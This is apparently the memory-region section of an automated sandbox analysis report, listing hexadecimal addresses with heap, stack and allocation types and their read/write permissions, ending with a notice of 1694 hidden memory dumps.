page read and write
69BB000
heap
page read and write
3412000
heap
page read and write
5F09000
heap
page read and write
31D3000
heap
page read and write
30AA000
heap
page read and write
D106000
heap
page read and write
947C000
unkown
page readonly
6157000
heap
page read and write
2B51000
heap
page read and write
1020000
heap
page read and write
87A000
heap
page read and write
A487000
direct allocation
page read and write
D20F000
heap
page read and write
297B000
direct allocation
page read and write
32DC000
heap
page read and write
9199000
unkown
page read and write
2B51000
heap
page read and write
6243000
trusted library allocation
page read and write
B9B5000
heap
page read and write
C295000
heap
page read and write
6304000
trusted library allocation
page read and write
E052000
heap
page read and write
449F000
stack
page read and write
CB1E000
stack
page read and write
3277000
heap
page read and write
970A000
trusted library allocation
page read and write
32D4000
heap
page read and write
3414000
heap
page read and write
328E000
stack
page read and write
2F4E000
stack
page read and write
61C8000
heap
page read and write
D4E5000
heap
page read and write
DF8D000
heap
page read and write
55B0000
unkown
page readonly
D4E4000
heap
page read and write
3414000
heap
page read and write
BB8C000
heap
page read and write
6F8F9000
unkown
page read and write
DF4A000
heap
page read and write
3292000
heap
page read and write
BF18000
heap
page read and write
630D000
trusted library allocation
page read and write
3353000
heap
page read and write
E1DE000
heap
page read and write
6245000
trusted library allocation
page read and write
2A84000
heap
page read and write
B69C000
stack
page read and write
3363000
heap
page read and write
366F000
stack
page read and write
E60000
heap
page read and write
BD08000
heap
page read and write
A0CA000
direct allocation
page read and write
400000
unkown
page readonly
602E000
stack
page read and write
2965000
direct allocation
page read and write
31E3000
heap
page read and write
There are 1694 hidden memdumps, click here to show them.